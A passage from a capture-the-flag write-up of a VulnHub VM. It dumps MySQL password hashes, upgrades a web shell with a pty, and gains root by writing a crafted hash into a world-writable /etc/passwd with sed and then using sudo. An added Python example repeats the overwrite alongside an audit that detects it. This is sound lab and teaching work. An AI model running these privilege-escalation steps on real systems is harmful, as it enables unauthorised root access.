adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

We need to get access to this user!

I start to explore the rest of the database. There's nothing else of interest in the current database (bank_database), so I move on to the others. There is another database named vulnbank, but it's simply an empty copy of bank_database. I check the mysql.user table too, but nothing else of interest. This did make me laugh though.

mysql> select User,authentication_string from user;
+------------------+-------------------------------------------+
| User             | authentication_string                     |
+------------------+-------------------------------------------+
| root             | *EF810ED8A4380B74BCD0BE94774DB83CF9197F8C |
| mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *9C821206E17899E16AFF4B6740169000AC894873 |
+------------------+-------------------------------------------+
3 rows in set (0.01 sec)

Nice..

So we have the password for the root user on mysql. Let's see if that's shared by the system root user.

First we need a proper TTY. python isn't available under that name, but python3 is. I spawn a shell, and then try to su to root.

python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ su
su
Password: NuCiGoGo321

su: Authentication failure

No such luck - I didn't think it'd be that easy.

I couldn't find any useful binaries with their SUID bit set; however, I did find an interesting world-writable file.

find / -xdev -perm -0002 -type f -print 2>/dev/null
/etc/passwd
/var/crash/.lock

Riiiight. I read up on the format of the /etc/passwd file in this blog post.

  1. Username: used when the user logs in. It should be between 1 and 32 characters in length.
  2. Password: an x indicates that the hashed password is stored in /etc/shadow. If a hash is written directly into this field instead, it is used as-is (the pre-shadow behaviour).
  3. User ID (UID): each user must be assigned a user ID. UID 0 is reserved for root and UIDs 1-99 are reserved for other predefined accounts; UIDs 100-999 are reserved by the system for administrative and system accounts/groups.
  4. Group ID (GID): the primary group ID (stored in /etc/group).
  5. User ID Info: the comment (GECOS) field. It allows you to add extra information about the user such as full name, phone number etc. This field is used by the finger command.
  6. Home directory: the absolute path to the directory the user will be in when they log in. If this directory does not exist, the user's directory becomes /.
  7. Command/shell: the absolute path of a command or shell (/bin/bash). Typically this is a shell, but it does not have to be.

I'll admit - I had no idea you could specify an account password in the /etc/passwd file. Every day is a school day!

I go about generating a new password hash for the taviso user (we could equally set one for any user, root included, since the whole file is writable), and updating /etc/passwd.

openssl passwd -1 -salt salt letmein
$1$salt$bvDqL29IXg3sPhjeBKC/./
cp /etc/passwd /tmp/passwd
sed -i -e 's/taviso:x:/taviso:$1$salt$bvDqL29IXg3sPhjeBKC\/.\/:/g' /tmp/passwd
cp /tmp/passwd /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/$ su taviso
su taviso
Password: letmein

taviso@hackday:/$ id
id
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
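
The trick above works because the world-writable /etc/passwd lets anyone overwrite field 2, and the pre-shadow code path still honours a hash placed there. The following added example (mine, not from the writeup) does the same field replacement as the sed one-liner, but in Python, and pairs it with the check a defender wants: an audit that flags hashes stored directly in /etc/passwd, empty password fields and extra UID 0 accounts, plus a mode test for the world-writable bit. CLEAN_PASSWD is constructed sample content, and LETMEIN_MD5CRYPT is the hash generated with openssl above.

```python
import stat

# Constructed /etc/passwd content for the demo (not copied from the VM).
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
taviso:x:1000:1000:taviso,,,:/home/taviso:/bin/bash
"""

# Hash produced earlier in the writeup:  openssl passwd -1 -salt salt letmein
LETMEIN_MD5CRYPT = "$1$salt$bvDqL29IXg3sPhjeBKC/./"

FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Split /etc/passwd into dicts; rejects lines without exactly seven fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entry = dict(zip(FIELDS, fields))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entries.append(entry)
    return entries


def set_password_field(text, user, value):
    """What the sed one-liner did: overwrite field 2 for one user. Raises if absent."""
    out, hit = [], False
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = value
            hit = True
        out.append(":".join(fields))
    if not hit:
        raise KeyError(user)
    return "\n".join(out) + "\n"


def audit_passwd(text):
    """Findings a defender wants from this file, as (user, issue) tuples in file order."""
    findings = []
    for e in parse_passwd(text):
        if e["password"] == "":
            findings.append((e["name"], "empty password field, login without password"))
        elif e["password"] not in SHADOWED_OR_LOCKED:
            findings.append((e["name"], "password hash stored directly in /etc/passwd"))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid 0 account other than root"))
    return findings


def is_world_writable(mode):
    """True when the other-write bit is set, e.g. on os.stat('/etc/passwd').st_mode."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    tampered = set_password_field(CLEAN_PASSWD, "taviso", LETMEIN_MD5CRYPT)
    print(audit_passwd(CLEAN_PASSWD))   # []
    print(audit_passwd(tampered))       # [('taviso', 'password hash stored directly in /etc/passwd')]
    print(is_world_writable(0o100666))  # True, the mode we found on the VM
```

On a live box the two calls are audit_passwd(open('/etc/passwd').read()) and is_world_writable(os.stat('/etc/passwd').st_mode), and the expected results are an empty list and False. The fix is chmod 644 /etc/passwd, followed by pwck -r to confirm the file still parses.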

Last steps

Let's see what taviso can sudo.

taviso@hackday:/$ sudo -l
sudo -l
[sudo] password for taviso: letmein

Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

Fair enough - it'd be rude not to.

taviso@hackday:/$ sudo su
sudo su
root@hackday:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Time to get the flag!

root@hackday:/# cd /root
cd /root
root@hackday:~# ls -lah
ls -lah
total 28K
drwx------  3 root root 4.0K Oct 22 17:21 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
-rw-------  1 root root   58 Oct 22 17:21 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rw-r--r--  1 root root   61 Oct  9 13:36 flag.txt
drwxr-xr-x  2 root root 4.0K Oct  9 13:18 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
root@hackday:~# cat flag.txt
cat flag.txt
Urime,
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

The Albanian translates as "Congratulations, now start the report!".

Summary

A nice fun VM here. I learnt something (about the /etc/passwd file), and had a good couple of hours playing about. Thank you R-73eN, and thank you VulnHub for hosting it!